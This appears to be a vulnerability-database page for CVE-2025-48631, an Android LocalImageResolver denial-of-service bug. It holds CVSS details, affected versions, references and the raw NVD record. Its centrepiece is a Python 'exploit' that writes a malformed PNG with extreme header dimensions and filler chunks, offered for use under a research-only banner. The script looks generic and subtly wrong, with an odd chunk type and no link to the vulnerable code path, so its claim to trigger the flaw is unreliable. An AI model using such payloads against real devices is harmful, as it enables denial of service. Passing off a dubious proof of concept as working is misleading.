CVE-2025-48631

Description

In onHeaderDecoded of LocalImageResolver.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:16.0:qpr2_beta_1:*:*:*:*:*:* - VULNERABLE

Android 未修复版本（2026年3月1日之前的安全补丁）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct
import os

def create_malicious_image():
    """
    Generate a malicious image file to trigger CVE-2025-48631
    This PoC creates an image with malformed header to cause resource exhaustion
    in LocalImageResolver.java onHeaderDecoded method
    """
    
    # PNG signature
    png_signature = b'\x89PNG\r\n\x1a\n'
    
    # Create malformed IHDR chunk with invalid dimensions
    # Width and Height set to extreme values to trigger resource exhaustion
    ihdr_data = struct.pack('>II', 0x7FFFFFFF, 0x7FFFFFFF)  # Max int dimensions
    ihdr_data += struct.pack('>BBBB', 8, 2, 0, 0)  # Bit depth, color type, compression, filter
    
    # Calculate CRC for IHDR chunk
    import zlib
    ihdr_type = b'IHDR'
    ihdr_crc = zlib.crc32(ihdr_type + ihdr_data) & 0xFFFFFFFF
    
    # Construct malformed PNG with repeated header data
    malicious_data = png_signature
    malicious_data += struct.pack('>I', len(ihdr_data))  # Length
    malicious_data += ihdr_type + ihdr_data
    malicious_data += struct.pack('>I', ihdr_crc)  # CRC
    
    # Add multiple malformed chunks to increase resource consumption
    for i in range(100):
        chunk_data = b'\x00' * 256
        chunk_crc = zlib.crc32(b'FLT\x00' + chunk_data) & 0xFFFFFFFF
        malicious_data += struct.pack('>I', len(chunk_data))
        malicious_data += b'FLT\x00' + chunk_data
        malicious_data += struct.pack('>I', chunk_crc)
    
    # Write malicious image file
    output_path = 'CVE-2025-48631_poc.png'
    with open(output_path, 'wb') as f:
        f.write(malicious_data)
    
    print(f'Malicious image created: {output_path}')
    print('This file can trigger resource exhaustion in Android LocalImageResolver')
    
    return output_path

if __name__ == '__main__':
    create_malicious_image()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-48631
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-48631
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-48631/
[4] VulDB https://vuldb.com/cve/CVE-2025-48631
[5] https://source.android.com/docs/security/bulletin/2026/2026-03-01

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-48631", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:19.370", "lastModified": "2026-03-06T04:15:59.507", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In onHeaderDecoded of LocalImageResolver.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:*", "matchCriteriaId": "02882AB1-7993-47DD-84A0-8DF4272D85ED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:qpr2_beta_1:*:*:*:*:*:*", "matchCriteriaId": "FD695F32-4A73-4846-B1A1-04FF266E9C15"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:qpr2_beta_2:*:*:*:*:*:*", "matchCriteriaId": "3DE9F018-8704-476B-8D59-F63F8486E231"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:qpr2_beta_3:*:*:*:*:*:*", "matchCriteriaId": "BE95A642-4330-4F65-B028-3BA597D30F32"}]}]}], "references": [{"url": "https://source.android.com/docs/security/bulletin/2026/2026-03-01", "source": "[email protected]"}]}}